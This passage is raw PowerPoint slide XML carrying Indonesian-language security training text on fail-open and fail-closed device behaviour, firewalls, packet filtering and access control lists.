              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banjir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>angin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>topan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gempa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bumi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal-terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal-tertutup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Gagal-terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal-terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merekayasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kondisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Gagal-tertutup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diblokir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasuki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kondisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengingat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal-tertutup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>henti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal-tutup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecuali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alternatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal-terbuka</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104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134777218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Firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencegahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menegakkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penyaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Paket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (ACL). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
